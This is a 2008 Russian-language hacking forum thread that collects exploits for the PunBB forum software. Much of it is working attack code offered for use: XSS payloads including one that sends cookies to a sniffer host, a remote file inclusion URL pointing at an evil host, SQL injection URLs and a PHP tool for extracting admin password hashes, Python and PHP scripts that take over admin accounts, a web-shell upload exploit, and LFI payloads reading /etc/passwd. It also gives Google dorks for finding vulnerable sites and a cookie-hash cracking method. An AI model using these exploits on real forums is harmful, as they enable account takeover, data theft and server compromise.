Форумы [Обзор уязвимостей PunBB]

Discussion in 'Уязвимости CMS/форумов' started by ettee, 20 Jan 2008.

  1. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    PunBB <= 1.2.14 Remote Code Execution Exploit
    PunBB version <= 1.2.2 Authentication Bypass Exploit
    ShAnKaR: multiple PHP application poison NULL byte vulnerability
    PunBB 1.2.4 (change_email) SQL Injection Exploit


    1.2.11
    PHP:
     index.php&req_subject=test&req_message=test"><script>alert(1);</script>  
    <= 1.2.16(moderate.php)
    PHP:
    preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/'$_GET['get_host'])) 
    moderate.php?get_host=1.1.1.1<script>alert(1)</script>

    <= 1.2.16
    PHP:
    moderate.php?get_host=1.1.1.1<script>alert(1)</script>
    <= 1.2.15 (message_popup.php) XSS code vulnerability
    PHP:
    <?php echo $lang_pms['Popup new'],  $return['sender'], $lang_pms['Popup subj'], $return['subject'?><br><?php echo  $lang_pms['Popup send'],  format_time($return['posted']) ?> 
    <= 1.2.13 SQL Injection
    PHP:
    search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1
    dork: warning: ini_get has been

    Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5
    PHP:
     include/common.php?pun_root=http://www.host_evil.com/cmd?&=id  
    PunBB <= 1.2.4 - change email to become admin exploit

    Code:
    #!/usr/bin/python
    ##################################################  #####################
    #  _  _                _                     _       ___  _  _  ___ 
    # | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
    # | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
    # |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
    #                                                        
    ##################################################  #####################
    #         Proof of concept code from the Hardened-PHP Project 
    ##################################################  #####################
    #
    #                           -= PunBB 1.2.4 =-
    #                   change_email SQL injection exploit
    #
    #  user-supplied data within the database is still user-supplied data
    #
    ##################################################  #####################
    
    import urllib
    import getopt
    import sys
    import string
    
    __argv__ = sys.argv
    
    def banner():
        print "PunBB 1.2.4 - change_email SQL injection exploit"
        print "Copyright (C) 2005 Hardened-PHP Project\n"
    
    def usage():
        banner()
        print "Usage:\n"
        print "   $ ./punbb_change_email.py [options]\n"
        print "        -h http_url   url of the punBB forum to exploit"
        print "                      f.e. http://www.forum.net/punBB/"
        print "        -u username   punBB forum useraccount"
        print "        -p password   punBB forum userpassword"
        print "        -e email      email address where the admin leve activation email is sent"
        print "        -d domain     catch all domain to catch \"some-SQL-Query\"@domain emails"
        print ""
        sys.exit(-1)
    
    def main():
        try:
            opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
        except getopt.GetoptError:
            usage()
    
        if len(__argv__) < 10:
            usage()
    
        username = None
        password = None
        email = None
        domain = None
        host = None
        for o, arg in opts:
            if o == "-h":
    	    host = arg
            if o == "-u":
                username = arg
            if o == "-p":
                password = arg
            if o == "-e":
                email = arg
            if o == "-d":
                domain = arg
    
        # Printout banner
        banner()
    
        # Check if everything we need is there
        if host == None:
            print "[-] need a host to connect to"
    	sys.exit(-1)
        if username == None:
            print "[-] username needed to continue"
            sys.exit(-1)
        if password == None:
            print "[-] password needed to continue"
            sys.exit(-1)
        if email == None:
            print "[-] email address needed to continue"
            sys.exit(-1)
        if domain == None:
            print "[-] catch all domain needed to continue"
    	sys.exit(-1)
    	
        # Retrive cookie
        params = {
            'req_username' : username,
    	'req_password' : password,
    	'form_sent' : 1
        }
    
        wclient = urllib.URLopener()
    
        print "[+] Connecting to retrieve cookie"
    
        req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
        info = req.info()
        if 'set-cookie' not in info:
            print "[-] Unable to retrieve cookie... something is wrong"
            sys.exit(-3)
        cookie = info['set-cookie']
        cookie = cookie[:string.find(cookie, ';')]
        print "[+] Cookie found - extracting user_id"
        user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
        print "[+] User-ID: %d" % (int(user_id))
        wclient.addheader('Cookie', cookie);
    
        email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
        append = 'group_id=\'1'
        email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
    
        params = {
            'req_new_email' : email,
    	'form_sent' : 1
        }
    
        print "[+] Connecting to request change email"        
        req = wclient.open(host + "profile.php?action=change_email&id=" + user_id,
    urllib.urlencode(params))        
    
        print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
    
    if __name__ == "__main__":
        main()
    PunBB BBCode URL Tag Script Injection Vulnerability
    PHP:
     [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th  is.sss));'sss=`i=new/**/Image();i.src='http://baba/sniffer.php?c='+document.cookie;this.sss=null`styl  e='font-size:0;][/url][/url]'[/color] 


    -punbb_users
    --id
    --group_id
    --username
    --password


    Dork example:
    intext:"Powered by PunBB 1.2.5"
    intext:"Powered by PunBB" -"1.2.6" -"1.2.7"
    intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7"
    intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic"
    intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog
     
    _________________________
    #1 ettee, 20 Jan 2008
    Last edited: 20 Jan 2008
    1 person likes this.
  2. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    Криптографическая атака

    Алгоритм шифрования в куках:
    PHP:
    md5($cookie_seed.md5(password))  
    Пример:
    md5($cookie_seed.md5("123"))="beae53ed5f767f344b03646a1aa5b16e"
    В состав строгого значения входят символы из ряда "abcdef1234567890".

    Схема генерации куков:
    PHP:
    md5($cookie_seed.$pun_user['password'])  
    $pun_user['password'] - sha1() или md5() хеш пароль пользователя.
    $cookie_seed - соль ("идентична" для всех пользователей).

    Дефолтное значение алгоритма для $cookie_seed(config.php):
    PHP:
     function pun_hash($str)
    {
        if (
    function_exists('sha1'))    // Only in PHP 4.3.0+
            
    return sha1($str);
        else if (
    function_exists('mhash'))    // Only if Mhash library is loaded
            
    return bin2hex(mhash(MHASH_SHA1$str));
        else return 
    md5($str);
    }  
    PasswordPro не обладает алгоритмом перебора md5(salt.md5(pass)) поэтому будем использовать метод "перебор по маске":
    "Набор символов" для пользовательской маски: ?1: abcdef1234567890
    Маска: ?1?1?1?1?1?1?1?1202cb962ac59075b964b07152d234b70
    Значение длины: 40-40

    ===
    UPDATE: PasswordPro теперь имеет соответствующий модуль
     
    _________________________
    #2 ettee, 20 Jan 2008
    Last edited by a moderator: 3 Sep 2008
    2 people like this.
  3. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    PunBB <= 1.2.16 Blind Password Recovery Exploit

    PunBB <= 1.2.16 Blind Password Recovery Exploit

    http://www.milw0rm.com/exploits/5165

    Code:
    <?php
    /**
     * Original : http://sektioneins.de/advisories/SE-2008-01.txt
     * Thanks to Stefan Esser, here's the exploit.
     *
     * Team : EpiBite
     * firefox, petit-poney, thot
     * Nous tenons a remercier nos mamans et papas respectifs.
     * Let's get a fu*** coffee !
     */
    
    // conf
    define('URL', 'http://localhost/punbb_1-2-16_fr/upload');	// base url
    define('EMAIL', '[email protected]');				// your email
    define('LOGIN', 'login_x');					// your login
    define('PASS', '620553.8I73');					// your pass
    // Exploit
    printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL);
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL,
    URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer');
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    $s = curl_exec($h);
    preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m);
    define('ADMIN', $m[2]);
    preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m);
    if (count($m))
      define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1]));
    else
      define('DATE', time() - 86400); //just in case, the forum or account
    just has been created
    printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE);
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
    // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($h, CURLOPT_HEADER, 1);
    curl_setopt($h, CURLOPT_POST, 1);
    curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
    						       'req_email='.urlencode(EMAIL),
    						       'request_pass=Envoyer')));
    preg_match('/mailto:([^"]*)"/', curl_exec($h), $m);
    define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically
    get, set manually if there's problem)
    printf("Admin mail : %s\n--\n", ADMIN_MAIL);
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
    curl_setopt($h, CURLOPT_COOKIE,
    'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 =>
    md5('bite')))));
    curl_setopt($h, CURLOPT_HEADER, 1);
    curl_setopt($h, CURLOPT_POST, 1);
    curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
    						       'req_email='.urlencode(ADMIN_MAIL),
    						       'request_pass=Envoyer')));
    $s = curl_exec($h);
    preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
    $c = unserialize(urldecode($m[1]));
    define('MD5_NOT_LOGGUED', $c[1]);
    printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($h, CURLOPT_HEADER, 1);
    // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
    curl_setopt($h, CURLOPT_POST, 1);
    curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
    						       'redirect_url=index.php',
    						       'req_username='.LOGIN,
    						       'req_password='.PASS)));
    $s = curl_exec($h);
    preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
    $c = unserialize(urldecode($m[1]));
    define('MD5_LOGGUED', $c[1]);
    printf("Md5 loggued : %s\n--\n", MD5_LOGGUED);
    define('PASS_MD5ED', sha1(PASS));
    $chars = array('/', '-', "\\", '|');
    for ($p = 0; $p < 86400 * 2; $p++)
    {
      if (!($p % 300))
        echo $chars[($p / 300) % 4]."\r";
      if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)),
    -8).PASS_MD5ED)) == 0)
        {
          define('SEED', substr(md5(DATE + $p), -8));
          break;
        }
    }
    printf("Seed : %s\n--\n", SEED);
    for ($p = 0; $p < 1000000; $p++)
    {
      if (!($p % 300))
        echo $chars[($p / 300) % 4]."\r";
      mt_srand((double)$p);
      if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0)
        {
          define('SRAND', $p);
          break;
        }
    }
    printf("SRAND : %s\n--\n", SRAND);
    mt_srand(SRAND);
    random_pass(8);
    printf("New password : %s\n--\n", random_pass(8));
    $url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8);//
    Id is set to '2' (the admin's id, but you can change your target)
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, $url);
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    curl_exec($h);
    function random_pass($len)
    {
      $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
      $password = '';
      for ($i = 0; $i < $len; ++$i)
        $password .= substr($chars, (mt_rand() % strlen($chars)), 1);
      return $password;
    }
    
    # milw0rm.com [2008-02-21]
     
    #3 Solide Snake, 21 Feb 2008
    Last edited by a moderator: 3 Sep 2008
    2 people like this.
  4. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload

    PHP:
    <?php
    # PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload
    # h3ck.[rv.ua], 2008

    $host 'localhost'# хост
    $path '/punbb/';   # путь к форуму
    $file_type 'image/gif';
    $file_name 'sh1.gif.php'# название нового файла
    $file_code '<?php phpinfo(); ?>'# код, который будем выполнять
    $cookie 'punbb_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A32%3A%220b9ca83006024ac122e2b1c459c0804f%22%3B%7D'# без авторизации не будет работать..
    $file_content base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');
    $post_data = <<<POST
    ------------9cYrkcaQ3YTUyzCSnL8xD2
    Content-Disposition: form-data; name="form_sent"

    1
    ------------9cYrkcaQ3YTUyzCSnL8xD2
    Content-Disposition: form-data; name="imagefile"; filename="
    $file_name"
    Content-Type: 
    $file_type

    ${file_content}${file_code}
    ------------9cYrkcaQ3YTUyzCSnL8xD2
    Content-Disposition: form-data; name="uploadimg"

    Submit
    ------------9cYrkcaQ3YTUyzCSnL8xD2--

    POST;
    $post_len strlen($post_data);
    $req = <<<REQ
    POST http://${host}${path}uploadimg.php?subpage=upload HTTP/1.0
    User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)
    Host: 
    $host
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: uk-UA,uk;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Cookie: 
    $cookie
    Content-Length: 
    $post_len
    Content-Type: multipart/form-data; boundary=----------9cYrkcaQ3YTUyzCSnL8xD2
    Connection: Close

    $post_data
    REQ;
    $fp fsockopen($host80$errno$errstr30);
    if (!
    $fp) { echo "$errstr ($errno)<br />\n"; }
    else {
        echo 
    "Sending... <pre>$req</pre>\n";
        
    fwrite($fp$req);
        while (!
    feof($fp)) { echo fgets($fp); }
        
    fclose($fp);
    }
    ?>
     
    #4 Goudini, 17 Jun 2008
    Last edited by a moderator: 3 Sep 2008
  5. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    PunBB Migration Tool 1.4.0

    PunBB Migration Tool 1.4.0

    Download URL:
    Code:
    http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tar
    Bug Type:Local File Inclusion

    Bug In:
    Code:
    [I]converters/index.php[/I]
    Vulnerable Code:
    Code:
    <?php   // Load a specific page         else{              if(file_exists($_GET['page'] . '.php'))               include $_GET['page'] . '.php';            else               include 'settings.php';     ?>
    Proof Of Concept:http://www.website.com/[path]/converters/index.php?page=/etc/passwd%00
     
  6. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    PunBB 1.2.17 Sql injection & File reader

    Code:
    v1.2.17 punbb.ru rev87 
    /message_popup.php
    message_popup.php?id=0+UNION+SELECT+user_id,concat_ws(0x3a,table_name),2,3+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+номер таблицы,1
    узнаем префикс по таблицам.
    -----------------------------------SQL<
    /message_popup.php?id=0+union+select+user_id,username,3,password+from+[PREFIX]users+where+id=2
    Узнаем имя и хеш админа.
    -----------------------------------SQL<
    download.php
    /download.php?aid=9+union+select+1,file,3,user_id,null,1
    просматриваем файлы на хосте
    -----------------------------------SQL<
    
    user_id - Ваш id на форуме через который вы зашли

    By @Fatal@ aka Doom123

    PHP:
    <?php

    /**
     * @author @Fatal@
     * @copyright HWT©2008
     * 
     *   PunBB expl0it
     * 
     * Уязвимость существует по причине недостатачной обработки
     * входящх данных в файле download.php!
     * 
     * Овтор не несёт ответствености за использоваение данного скрипта!
     * Используйте его на свой страх и риск!  
     * 
     *  Уязвимость нашёл @Fatal@.
     */
     
    if (isset($_POST['start']))
    {
      if (!empty(
    $_POST['login']) && !empty($_POST['pass']) && !empty($_POST['host']) && !empty($_POST['id']) && !empty($_POST['path']))
        {
          
    define("_HOST"$_POST['host']);
            
    define("_PORT"80);

            function 
    cookie($ans)
            {
                
    $head 'Cookie:';
                foreach (
    $ans as $val)
                {

                    if (
    preg_match('#Set-Cookie:(.+)#is'$val$pock))
                    {
                        
    $co explode(';'$pock['1']);
                        
    $head .= ' ' trim($co[0]) . ';';
                    }
                }
                return 
    $head " \r\n";
            }

            function 
    Prepare_POST_array($arr)
            {
                
    $out '';
                foreach (
    $arr as $key => $line)
                {
                    if (
    $out == '')
                        
    $out .= $key '=' urlencode($line);
                    else
                        
    $out .= '&' $key '=' urlencode($line);
                }

                return 
    $out "\r\n\r\n";
            }

            function 
    post_query($path$param$cook ''$AnswerFlag true)
            {
                
    $out "POST " $path " HTTP/1.1\r\n";
                
                if (
    $param == array())
                {
                    
    $out "GET " $path " HTTP/1.1\r\n";
                    
    $data "";
                } else
                    
    $data Prepare_POST_array($param);
                    
                
    $fp fsockopen(_HOST_PORT$errno$errstr30);
                if (!
    $fp) return false;
                
                
                
    $out .= "Host: " _HOST "\r\n";
                
    $out .= "Content-Type: application/x-www-form-urlencoded; charset=windows-1251\r\n";
                
    $out .= "Content-Length: " strlen($data) . "\r\n";
                
    $out .= "User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)\r\n";
                
    $out .= $cook;
                
    $out .= "Connection: Close\r\n\r\n";
                
    $out .= $data;

                
    fwrite($fp$out);
                if (
    $AnswerFlag)
                {
                    while (!
    feof($fp))
                    {
                        
    $answer[] = fgets($fp1024);
                    }
                } else
                    
    $answer true;
                    
                    
                
    fclose($fp);
                return 
    $answer;
            }
                
    $array = array(
          
    'form_sent' => '1'
          
    'redirect_url' => 'index.php'
          
    'req_username' => $_POST['login'], 
          
    'req_password' => $_POST['pass'], 
          );
          
            
    $ans post_query($_POST['path'].'login.php?action=in'$array);
            
    $a cookie($ans);

      if(
    $_POST['method'] != 2)
      {
          if (!empty(
    $_POST['nid']))
          {
            if(empty(
    $a))
              
    $error 'Не верно введены логин или пароль';
            
            else {
            
    $page $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3,'.$_POST['id'].',null,6+FROM+users+WHERE+id+like+'.$_POST['nid'];
            
            
    $ans2 post_query($page, array(), $a);
            
    $str implode('',$ans2);
            
            if(
    strrpos($str"doesn't exist (Errno: 1146)") !== false)
            {
          
    preg_match("# Table '(.+?)\.users' doesn't exist \(Errno: 1146\)#is",$str,$pock);
          
    $hex '0x'.bin2hex($pock[1]);
          
    $page $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,table_name,3,'.$_POST['id'].',null,6+FROM+information_schema.columns+WHERE+table_schema+like+'.$hex;
              
    $ans3 post_query($page, array(), $a);
              
    $str implode('',$ans3);
              
    preg_match('#PunBB reported</strong>: (.+?)attachments - this file does not exist#is',$str,$pock);
              
    $pref = isset($pock[1]) ? $pock[1] : $_POST['prefix'];
          
    $page $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3,'.$_POST['id'].',null,6+FROM+'.$pref.'users+WHERE+id+like+'.$_POST['nid'];  
          
    $ans2 post_query($page, array(), $a);
          
    $str implode('',$ans2);
        }
        
    preg_match('#PunBB reported</strong>: (.{0,40}) - this file does not exist#is',$str,$pock);
            echo 
    "<center><b><h1>Хеш пользователя:".$pock[1]."</h1></b></center>";
            }
          } else
              
    $error "Введите все данные";
        } else {
          if (!empty(
    $_POST['file']))
          {
            if(empty(
    $a))
              
    $error 'Не верно введены логин или пароль';
            
            else {
            
    $page $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,"'.$_POST['file'].'",3,'.$_POST['id'].',null,6';
            
    $ans2 post_query($page, array(), $a);
        
    $i 11;
        while(
    array_key_exists($i,$ans2))
        {
          echo 
    htmlspecialchars($ans2[$i]).'<br>';
          
    $i++;
        }
            }
        } else
          
    $error "ВВедите все данные";
        
      }
        } else
        
    $error "ВВедите все данные";
    }

    if(isset(
    $error) || !isset($_POST['start']))
    {
      echo 
    '<center>'.$error."<BR><BR><b>PunBB Expl0it</b><br><br>";
      echo 
    '<form method="post">';
      echo 
    'Хост: <input type="text" name="host"><br>';
      echo 
    'Путь: <input type="text" name="path"><br>';
      echo 
    'Префикс: <input type="text" name="prefix"><br>';
      echo 
    'Логин: <input type="text" name="login"><br>';
      echo 
    'Пароль: <input type="text" name="pass"><br>';
      echo 
    'В.id: <input type="text" name="id"><br>';
      echo 
    'Н.id: <input type="text" name="nid"><br>';
      echo 
    'Файл: <input type="text" name="file"><br>';
      echo 
    'Метод: <select name=method><option value=1>Извлечь хэш</option>';
      echo 
    '<option value=2>Просмотреть файл</option></select><br>';
      echo 
    '<input type="submit" name="start"></form>';
      echo 
    '<br><br>В.id - id вашего пользоваетля';
      echo 
    '<br>Н.id - id жертвы(Нжно заполнять при первом методе)';
      echo 
    '<br>Файл - Путь до файла (При втором методе)';
      echo 
    '<br>Путь - Папка форума например /path/  (Если форум не находатся в папке вводим /)';
      echo 
    '<br>Префикс - Обычно определяется сам но если не хватает доступа подставляется ваш';
      echo 
    '<br><BR><BR>C0ded by @Fatal@ For HW Team</center>';
    }
    ?>
     
    #6 Doom123, 23 Jul 2008
    Last edited: 30 Jul 2008
  7. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    XSS PunBB 1.3RC

    XSS в самой последней версии 1.3RC

    Code:
    http://punbb/1.3/style/Oxygen/Oxygen.php?base_url=Oxygen.css" onload=alert()> <!---&forum_user[style]=1
     
    #7 Dr.Z3r0, 28 Jul 2008
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  8. kremator

    kremator New Member

    Joined:
    8 Feb 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    -5
    Multy vuln PunBB <= 1.2.19

    PunBB версии до 1.2.19

    Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и обойти некоторые ограничения безопасности.

    1. Уязвимость существует из-за недостаточной обработки входных данных в сценарии include/parser.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    2. Уязвимость существует из-за неизвестной ошибки, которая позволяет удаленному пользователю внедрить произвольные SMTP команды.
     
    #8 kremator, 30 Jul 2008
    Last edited by a moderator: 3 Sep 2008
  9. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit

    http://www.milw0rm.com/exploits/7159
    PHP:
    <?php

    error_reporting
    (0);
    ini_set("default_socket_timeout",5);




    /*
       
       
        PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
        -----------------------------------------------------------
        by athos - staker[at]hotmail[dot]it
        download mod http://www.punres.org/files.php?pid=52
        download cms http://punbb.org
        -----------------------------------------------------------
        register_globals = 1
        magic_quotes_gpc = 1
        
        Directory (files/include/pms)

        functions_navlinks.php?pun_user[language]=../../../../../etc/passwd
        profile_send.php?pun_user[language]=../../../../../etc/passwd
        viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd

        ../../etc/passwd and nullbyte
        


        File (files/include/pms/functions_navlinks.php)
        
        1. <?php
        2.     require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
        
        $pun_user['language'] isn't declared :D you can include any file
        
        functions_navlinks.php?pun_user[language]=../../../etc/passwd%00
        -------------------------------------------------------------------
        
        File (files/include/pms/header_new_messages.php)
        
        1. <?php
        2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){
        3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
        
        $pun_user['g_pm'] isn't declared
        $pun_config['o_pms_enabled'] isn't declared
        
        header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00
        
        
        -------------------------------------------------------------------
        
        File (files/include/pms/profile_send.php))
        
        1. <?php
        2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
        
        $pun_user['language'] isn't declared
        
        profile_send.php?pun_user[language]=../../../../etc/passwd%00
        
        -------------------------------------------------------------------
        
        File (files/include/pms/viewtopic_PM-link.php)
        
        1. <?php
        2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
        
        $pun_user['language'] isn't declared
        
        viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00
        
        -------------------------------------------------------------------
        
        
        Usage:  php [punbb.php] [host/path] [mode]
                php [punbb.php] [host/path] [save]
                php [punbb.php] [host/path] [NULL]
               
       Example:
                php punbb.php localhost/punbb save
                php punbb.php localhost/punbb
              
                       
        NOTE: Don't add me on MSN Messenger

        
        
    */    

    $exploit = new Exploit;
    $domain $argv[1];
    $mymode $argv[2];

    $exploit->starting();
    $exploit->is_vulnerable($domain);
    $exploit->exploiting($domain,$mymode);

     

    class 
    Exploit
    {
      
      function 
    http_request($host,$data
      {   
       
        if(!
    $socket socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) 
        {
           echo 
    "socket_create() error!\r\n";
           exit;
        }
        if(!
    socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
        { 
          echo 
    "socket_set_option() error!\r\n";
          exit;
        }
        
        if(!
    socket_connect($socket,$host,80))
        {
          echo 
    "socket_connect() error!\r\n";
          exit;
        }
        if(!
    socket_write($socket,$data,strlen($data)))
        {
          echo 
    "socket_write() errror!\r\n";
          exit;
        }
      
        while(
    $get socket_read($socket,1024,PHP_NORMAL_READ)) 
        { 
          
    $content .= $get
        }

        
    socket_close($socket);
      
       
       
    $array = array(
                     
    'HTTP/1.1 404 Not Found',
                     
    'HTTP/1.1 300 Multiple Choices',
                     
    'HTTP/1.1 301 Moved Permanently',
                     
    'HTTP/1.1 302 Found',
                     
    'HTTP/1.1 304 Not Modified',
                     
    'HTTP/1.1 400 Bad Request',
                     
    'HTTP/1.1 401 Unauthorized',
                     
    'HTTP/1.1 402 Payment Required',
                     
    'HTTP/1.1 403 Forbidden',
                     
    'HTTP/1.1 405 Method Not Allowed',
                     
    'HTTP/1.1 406 Not Acceptable',
                     
    'HTTP/1.1 407 Proxy Authentication Required',
                     
    'HTTP/1.1 408 Request Timeout',
                     
    'HTTP/1.1 409 Conflict',
                     
    'HTTP/1.1 410 Gone',
                     
    'HTTP/1.1 411 Length Required',
                     
    'HTTP/1.1 412 Precondition Failed',
                     
    'HTTP/1.1 413 Request Entity Too Large',
                     
    'HTTP/1.1 414 Request-URI Too Long',
                     
    'HTTP/1.1 415 Unsupported Media Type',
                     
    'HTTP/1.1 416 Request Range Not Satisfiable',
                     
    'HTTP/1.1 417 Expectation Failed',
                     
    'HTTP/1.1 Retry With',
                    );
                    
                   
        for(
    $i=0;$i<=count($array);$i++)
       
        if(
    eregi($array[$i],$content)) 
        {
          return (
    "$array[$i]\r\n");
          break;
        } 
        else 
        {
          return (
    "$content\r\n");
          break;
        }
      }
         
      
      function 
    is_vulnerable($host)
      {
        
    $host explode('/',$host);
        
        
    $header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
        
    $header .= "Host: $host[0]\r\n";
        
    $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
        
    $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        
    $header .= "Accept-Language: en-us,en;q=0.5\r\n";
        
    $header .= "Accept-Encoding: gzip,deflate\r\n";
        
    $header .= "Connection: close\r\n\r\n";
        
        if(
    stristr($this->http_request($host[0],$header),"\\'"))
        {  
          echo 
    "[+] Magic Quotes GPC/Register Globals On!\n";
          echo 
    "[+] Exploit Failed!\n";
          exit;
        }
        else
        {
          return 
    false;
        }
      }
      
      function 
    starting()
      {
       
        global 
    $argv;
        
        if(
    preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
        {
        
          echo 
    "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
          echo 
    "[+] by athos - staker[at]hotmail[dot]it\r\n";
          echo 
    "    -----------------------------------------------------------\r\n";
          echo 
    "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
          echo 
    "[+] Usage: php $argv[0] [host/path] [save]\r\n";
          echo 
    "[+] Usage: php $argv[0] [host/path]        \r\n";
          exit;
        
        }
      }
      
      function 
    exploiting($host,$mode)
      {
        
        
    $host explode('/',$host);
        
    $i 0;
        
        
        echo 
    "[+] Local File (ex: ../../etc/passwd%00)\r\n";
        echo 
    "[+] Local File: ";
        
        
    $file stripslashes(trim(fgets(STDIN)));
        
        if(empty(
    $file)) die("you fail");
        
        
        
